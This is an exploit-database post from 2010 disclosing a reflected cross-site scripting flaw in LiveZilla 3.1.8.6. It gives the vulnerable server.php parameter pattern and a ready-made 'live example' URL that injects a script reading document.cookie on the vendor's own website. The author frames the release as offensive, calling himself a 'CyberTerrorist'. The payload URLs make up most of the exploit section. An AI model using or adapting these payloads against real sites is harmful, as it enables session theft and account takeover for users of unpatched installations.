LiveZilla 3.1.8.6 - Cross Site Scripting (XSS) Vulnerability

Posted by bursali | Posted in Exploits | Posted on 27.05.2010 @ 18:22:42

0

As HTML File: Click here..

	.o8                                               oooo   o8o
	"888                                               `888   `"'
	888oooo.  oooo  oooo  oooo d8b  .oooo.o  .oooo.    888  oooo
	d88' `88b `888  `888  `888""8P d88(  "8 `P  )88b   888  `888
	888   888  888   888   888     `"Y88b.   .oP"888   888   888
	888   888  888   888   888     o.  )88b d8(  888   888   888
	`Y8bod8P'  `V88V"V8P' d888b    8""888P' `Y888""8o o888o o888o
########################### INFORMATIONS #######################################
#
#
# [+] Exploit Title: LiveZilla 3.1.8.6 - Cross Site Scripting (XSS) Vulnerability
# [+] Date: 25-05-2010
# [+] Author: bursali | admin[at]bursali.eu | www.bursali.eu
# [+] Software Link: http://www.livezilla.net/
# [+] Version: 3.1.8.6
# [+] Tested on: PHP
# [+] Dork: Use your brain (;
#
# [?] Greetz to: GabberGandalf, fred777, J0hn.X3r, Montaxx, Dexx, DeeWayne,
#                Nazrek, Sawyer, VeN0m, Lidloses_Auge, Suicide, Toastbrot,
#		 soulstoned enco, DizzY_D, Zikke, n0ne-crew, Free-Hack
#		 and the wh0le other morons ;D
#
#
#################################################################################
########################## Exploit #############################
It's a basic Cross Site Scripting Vulnerability (;
Example:
http://[server]/[Livezilla Directory]/server.php?request=track&
output=jcrpt&code=[XSS]&nse=
Live Example:
http://www.livezilla.net/livezilla/server.php?request=track&
output=jcrpt&code=%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&nse=
########################## LAST WORDS #############################
Visit www.bursali.eu - Home of the CyberTerrorist <3
~bursali
#####
Tweet this!
Next >>
Mail
Twitter
Facebook